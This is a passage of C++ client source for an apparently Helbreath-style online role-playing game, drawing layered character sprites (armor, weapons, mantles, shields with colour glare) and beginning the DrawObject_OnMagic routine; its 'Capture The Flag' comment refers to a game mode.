				else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
				if (_tmp_cFrame == 3) m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy, _tmp_cFrame -1, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
			}
			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				}
				break;
			}

			if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			else {
				if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				    m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);


			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0)) {
				if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

			if ((iHairIndex != -1) && (iHelmIndex == -1)) {
				_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1)) {
				if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1) {
				if (iPantsColor == 0)
					 m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1) {
				if (iArmColor == 0)
					 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0)) {
				if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1) {
				if (iArmorColor == 0)
					 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1) {
				if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2)) {
				if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iShieldIndex != -1)
			{	if (iShieldColor == 0)
					 m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

				else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1)) {
				if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}
		}else
		{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;

			default:
				if (m_cDetailLevel != 0) {
					if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX+dx, sY+dy, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				}
				break;
			}

			if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			else {
				if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				    m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0)) {
				if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

			if ((iHairIndex != -1) && (iHelmIndex == -1)) {
				_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1)) {
				if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1) {
				if (iPantsColor == 0)
					 m_pSprite[iPantsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1) {
				if (iArmColor == 0)
					 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0)) {
				if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1) {
				if (iArmorColor == 0)
					 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1)
			{	if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}


			if (iShieldIndex != -1)
			{	if (iShieldColor == 0)
					 m_pSprite[iShieldIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iShieldIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13+dx, sY -34+dy, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1)) {
				if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX+dx, sY+dy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iWeaponIndex != -1)
			{	if (iWeaponColor == 0)
					 m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
				else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
				if (_tmp_cFrame == 3) m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dx, sY+dy, _tmp_cFrame -1, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
		}	}

		// Berserk
		if ((_tmp_iStatus & 0x20) != 0)
			m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX+dx, sY+dy, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel(8+(_tmp_cDir - 1), sX+dx+20, sY+dy-20, _tmp_cFrame%8, dwTime);
		DrawWanted(sX + dx, sY + dy, dwTime);
		CheckActiveAura2(sX+dx, sY+dy, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX + dx, sY + dy, _tmp_cFrame, dwTime);

		if (bDashDraw == TRUE) {
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSpriteRGB(sX+dsx, sY+dsy, _tmp_cFrame, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
			if (iWeaponIndex != -1) m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX+dsx, sY+dsy, _tmp_cFrame, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
			if (iShieldIndex != -1) m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX+dsx, sY+dsy, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
		}
	
	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX + dx, sY + dy, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX + dx, sY + dy, _tmp_sOwnerType, _tmp_iStatus);
	}   }

	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID)) {
			m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX+dx;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY+dy;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	_tmp_dx = dx;
	_tmp_dy = dy;

	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;

	return FALSE;
}

BOOL   CGame::DrawObject_OnMagic(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iR, iG, iB, iHelmIndex, iMantleIndex; 
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;
 BOOL bInvy = FALSE;

	bInv = FALSE;

	if(_tmp_sOwnerType == 35 ) bInvy = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}

	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0)
			bInvy = TRUE;
		else
		{	if (_tmp_iChatIndex != NULL)
			{	if (m_pChatMsgList[_tmp_iChatIndex] != NULL)
				{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
					m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
				}else
				{	m_pMapData->ClearChatMsg(indexX, indexY);
			} 	}
			return FALSE;
	}	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
  		iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (8 * 8);
		iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 8;
		iHairIndex   = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 8;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 8;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 8;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 8;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 8;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 8;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 8;
		break;
	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;

		iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (8 * 8);
		iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 8;
		iHairIndex   = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 8;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 8;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 8;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 8;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 8;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 8;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 8;
		break;
	}

	
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX, sY, _tmp_cFrame);

	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if (bTrans == FALSE)
	{	CheckActiveAura(sX, sY, dwTime, _tmp_sOwnerType);
		switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
		case 10: // Slime
		case 35: // Energy Sphere
		
		case 81: // Abaddon
		case 91: // Gate
			break;
		default:
			if (m_cDetailLevel != 0) {
				if (sX < 50)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
			}
			break;
		}

		if (bInvy == TRUE)
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
		else {
			if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
		}
		SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

		if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);

		if ((iHairIndex != -1) && (iHelmIndex == -1))
		{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, iR, iG, iB, dwTime);
		}

		if ((iBootsIndex != -1) && (iSkirtDraw == 1))
		{	if (iBootsColor == 0)
				m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}

		if (iPantsIndex != -1)
		{	if (iPantsColor == 0)
				m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
			else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
		}

		if (iArmArmorIndex != -1)
		{	if (iArmColor == 0)
				m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
			else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
		}

		if ((iBootsIndex != -1) && (iSkirtDraw == 0))
		{	if (iBootsColor == 0)
				m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
